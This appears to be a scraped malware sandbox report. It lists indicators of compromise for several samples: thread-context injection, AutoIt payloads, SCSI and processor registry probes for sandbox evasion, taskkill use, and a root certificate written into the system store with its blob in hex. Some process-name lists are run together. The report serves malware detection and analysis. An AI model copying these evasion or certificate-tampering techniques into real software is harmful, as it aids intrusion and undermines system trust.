cupd.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exesisbkup.exe

pid	process
1672	cupd.exe
952	sisbkup.exe
1256	sisbkup.exe
988	sisbkup.exe
1472	sisbkup.exe
1708	sisbkup.exe
1556	sisbkup.exe
1560	sisbkup.exe
1608	sisbkup.exe
1588	sisbkup.exe
1732	sisbkup.exe
1740	sisbkup.exe
1696	sisbkup.exe
1992	sisbkup.exe
1148	sisbkup.exe
1292	sisbkup.exe
1444	sisbkup.exe
1792	sisbkup.exe
788	sisbkup.exe
1548	sisbkup.exe
1992	sisbkup.exe
1480	sisbkup.exe
364	sisbkup.exe
964	sisbkup.exe
560	sisbkup.exe
2016	sisbkup.exe
1760	sisbkup.exe
1612	sisbkup.exe
748	sisbkup.exe
1276	sisbkup.exe
1584	sisbkup.exe
1400	sisbkup.exe
1548	sisbkup.exe
436	sisbkup.exe
2000	sisbkup.exe
1740	sisbkup.exe
1212	sisbkup.exe
1696	sisbkup.exe
1072	sisbkup.exe
1080	sisbkup.exe
1432	sisbkup.exe
2032	sisbkup.exe
1912	sisbkup.exe
1072	sisbkup.exe
1400	sisbkup.exe
948	sisbkup.exe
1432	sisbkup.exe
888	sisbkup.exe
1516	sisbkup.exe
1588	sisbkup.exe
984	sisbkup.exe
1384	sisbkup.exe
276	sisbkup.exe
1884	sisbkup.exe
1724	sisbkup.exe
1304	sisbkup.exe
1984	sisbkup.exe
1572	sisbkup.exe
472	sisbkup.exe
1460	sisbkup.exe
788	sisbkup.exe
1544	sisbkup.exe
1548	sisbkup.exe
1912	sisbkup.exe

Suspicious use of SetThreadContext 34 IoCs

Processes:

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeE812.exeiuehjsaiuehjsaiuehjsa5CFC.exeiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsaiuehjsa

description	pid	process	target process
PID 612 set thread context of 1112	612	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
PID 812 set thread context of 1056	812	CF8F.exe	CF8F.exe
PID 1968 set thread context of 720	1968	E812.exe	E812.exe
PID 856 set thread context of 1944	856	iuehjsa	iuehjsa
PID 1200 set thread context of 572	1200	iuehjsa	iuehjsa
PID 1480 set thread context of 1952	1480	iuehjsa	iuehjsa
PID 1572 set thread context of 1768	1572	5CFC.exe	5CFC.exe
PID 1824 set thread context of 320	1824	iuehjsa	iuehjsa
PID 788 set thread context of 1600	788	iuehjsa	iuehjsa
PID 1516 set thread context of 1384	1516	iuehjsa	iuehjsa
PID 1568 set thread context of 1312	1568	iuehjsa	iuehjsa
PID 1724 set thread context of 1640	1724	iuehjsa	iuehjsa
PID 2396 set thread context of 2408	2396	iuehjsa	iuehjsa
PID 1876 set thread context of 968	1876	iuehjsa	iuehjsa
PID 2688 set thread context of 2672	2688	iuehjsa	iuehjsa
PID 1584 set thread context of 2160	1584	iuehjsa	iuehjsa
PID 1128 set thread context of 2948	1128	iuehjsa	iuehjsa
PID 2484 set thread context of 2576	2484	iuehjsa	iuehjsa
PID 3060 set thread context of 1480	3060	iuehjsa	iuehjsa
PID 2544 set thread context of 2696	2544	iuehjsa	iuehjsa
PID 2192 set thread context of 2364	2192	iuehjsa	iuehjsa
PID 2620 set thread context of 3020	2620	iuehjsa	iuehjsa
PID 2716 set thread context of 2648	2716	iuehjsa	iuehjsa
PID 964 set thread context of 2288	964	iuehjsa	iuehjsa
PID 2124 set thread context of 2592	2124	iuehjsa	iuehjsa
PID 2936 set thread context of 3004	2936	iuehjsa	iuehjsa
PID 2300 set thread context of 2780	2300	iuehjsa	iuehjsa
PID 2732 set thread context of 2476	2732	iuehjsa	iuehjsa
PID 2620 set thread context of 2212	2620	iuehjsa	iuehjsa
PID 2968 set thread context of 956	2968	iuehjsa	iuehjsa
PID 2600 set thread context of 2140	2600	iuehjsa	iuehjsa
PID 2528 set thread context of 2300	2528	iuehjsa	iuehjsa
PID 2912 set thread context of 2932	2912	iuehjsa	iuehjsa
PID 2204 set thread context of 3048	2204	iuehjsa	iuehjsa

autoit_exe 21 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/memory/1672-164-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1672-165-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1672-166-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1672-167-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1672-168-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/952-180-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/952-181-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/952-182-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/952-183-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/952-184-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1256-187-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1256-188-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1256-189-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1256-190-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/1256-191-0x0000000001040000-0x0000000001656000-memory.dmp	autoit_exe
behavioral1/memory/560-246-0x0000000002080000-0x0000000002CCA000-memory.dmp	autoit_exe
behavioral1/memory/560-247-0x0000000002080000-0x0000000002CCA000-memory.dmp	autoit_exe
behavioral1/memory/960-280-0x0000000002080000-0x0000000002CCA000-memory.dmp	autoit_exe
behavioral1/memory/960-281-0x0000000002080000-0x0000000002CCA000-memory.dmp	autoit_exe
behavioral1/memory/1488-547-0x00000000024F0000-0x000000000313A000-memory.dmp	autoit_exe
behavioral1/memory/1488-548-0x00000000024F0000-0x000000000313A000-memory.dmp	autoit_exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

324 1308 WerFault.exe 366.exe

pid	pid_target	process	target process
324	1308	WerFault.exe	366.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

iuehjsajjehjsajjehjsaiuehjsa1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exejjehjsaiuehjsaiuehjsajjehjsajjehjsajjehjsaiuehjsaCF8F.exeiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsajjehjsaiuehjsajjehjsaDE12.exejjehjsajjehjsajjehjsajjehjsajjehjsajjehjsa

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CF8F.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CF8F.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CF8F.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DE12.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	iuehjsa
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jjehjsa

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

630.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	630.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	630.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

856 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

988 taskkill.exe
1900 taskkill.exe

pid	process
856	timeout.exe

pid	process
988	taskkill.exe
1900	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exemshta.exemshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 20 IoCs

Processes:

netsh.exezfadmvvq.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	zfadmvvq.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	zfadmvvq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	zfadmvvq.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

366.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	366.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	366.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	366.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe

pid	process
1112	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1112	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264
1264

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

WerFault.exeB163.exe

pid process

1264
324 WerFault.exe
1696 B163.exe

pid	process
1264
324	WerFault.exe
1696	B163.exe

Suspicious behavior: MapViewOfSection 63 IoCs

Processes:

1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exeCF8F.exeDE12.exeiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsajjehjsaiuehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsaiuehjsajjehjsa

pid	process
1112	1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1056	CF8F.exe
1344	DE12.exe
1944	iuehjsa
1936	jjehjsa
572	iuehjsa
1216	jjehjsa
1952	iuehjsa
1128	jjehjsa
320	iuehjsa
1064	jjehjsa
1600	iuehjsa
1988	jjehjsa
1384	iuehjsa
276	jjehjsa
1312	iuehjsa
188	jjehjsa
1640	iuehjsa
456	jjehjsa
2408	iuehjsa
2384	jjehjsa
968	iuehjsa
2040	jjehjsa
2672	iuehjsa
2704	jjehjsa
2160	iuehjsa
2296	jjehjsa
2948	iuehjsa
2664	jjehjsa
2564	jjehjsa
2576	iuehjsa
1480	iuehjsa
2204	jjehjsa
2696	iuehjsa
2896	jjehjsa
2364	iuehjsa
2580	jjehjsa
3020	iuehjsa
1200	jjehjsa
2648	iuehjsa
1540	jjehjsa
2288	iuehjsa
2680	jjehjsa
2592	iuehjsa
1732	jjehjsa
3004	iuehjsa
2728	jjehjsa
2780	iuehjsa
2412	jjehjsa
2476	iuehjsa
2796	jjehjsa
2212	iuehjsa
2532	jjehjsa
956	iuehjsa
1568	jjehjsa
